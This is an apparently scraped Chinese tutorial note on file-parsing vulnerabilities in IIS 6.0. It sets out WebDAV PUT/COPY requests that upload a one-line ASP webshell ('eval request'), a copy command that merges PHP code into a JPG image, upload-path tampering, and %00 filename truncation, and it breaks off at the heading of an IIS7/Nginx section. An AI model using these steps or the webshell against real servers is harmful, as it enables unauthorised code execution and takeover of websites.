1. 程式人生 > >關於解析漏洞

關於解析漏洞

yun 條件 截斷 spa des 一句話木馬 復制 ng- arch

IIS6.0 解析漏洞

1.在網站目錄中如果存在名為*.asp、*asa的目錄,那麽該目錄下內的任何文件都會被解析成asp文件被執行。

2.再上傳圖片木馬的時候,將文件名改為*.asp;,jpg,該文件文件都會被IIS解析為asp文件執行。

3.還有IIS6.0 默認的可執行文件除了asp還包含這三種/wooyun.cer、/wooyun.asa、/wooyun.cdx

4.(轉載)WebDav漏洞(對IIS寫權限的利用,這個我們在之前學http請求的時候就說過的請求頭和正文語句,這段好好看)

  • 第一步,通過OPTIONS探測服務器所支持的HTTP方法

請求:

OPTIONS / HTTP/1.1

Host:www.example.com

響應:

Public:OPTIONS,TRACE,GET,HEAD,DELETE,PUT,POST,COPY,MOVE,MKCOL,PROPFIND,PROPPATCH,LOCK,UNLOCK,SEARCH

  • 第二步,通過PUT方法向服務器上傳腳本文件

請求:

PUT /a.txt HTTP/1.1

Host:www.example.com

Content-Length:30

<%eval request("chopper")%>

第三步,通過Move或Copy方法改名

請求:

COPY /a.txt HTTP/1.1

Host:www.example.com

Destination:http://www.example.com/cmd.asp

第四步,使用DELETE方法,攻擊者還可以刪除服務器上的任意文件

請求:

DELETE /a.txt HTTP/1.1

Host:www.example.com

5.當你上傳的木馬如asp/aspx,必須在IIS6.0環境,且在以x.asp為名稱的文件夾下面,才能執行圖片裏的代碼,也就是說,圖片木馬執行必須滿足2個條件:A:有x.asp文件夾;B:圖片木馬在x.asp文件夾下,那麽怎麽去達到這種目的就需要奇藝技巧了,常見的是通過%00截斷和一些個更改上傳時候的屬性。(下面會講到)

------------------------------------------------------------------------------------------------------------------------------------------------------------------------

圖片木馬制作方法

使用CMD制作一句話木馬。

參數/b指定以二進制格式復制、合並文件; 用於圖像類/聲音類文件

參數/a指定以ASCII格式復制、合並文件。用於txt等文檔類文件

copy 1.jpg/b+1.php 2.jpg

//意思是將1.jpg以二進制與1.php合並成2.jpg

那麽2.jpg就是圖片木馬了。

--------------------------------------------------------------------------------------------------

查看數據包,其中Content-Disposition:form-data;name=”path”下面的一行為服務保存文件的相對路徑,我們把原本的 uploadimg/ 改為 uploadimg/1.php;

---------------------------------------------------------------------------------------------------

截斷上傳,是借助%00截斷上傳使%00後面的字串被忽略,如:1.asp.jpg=1.asp%00.jpg,從而成功上傳shell。

---------------------------------------------------------------------------------------------------

二、IIS7.0/IIS 7.5/ Nginx <8.03畸形解析漏洞

關於解析漏洞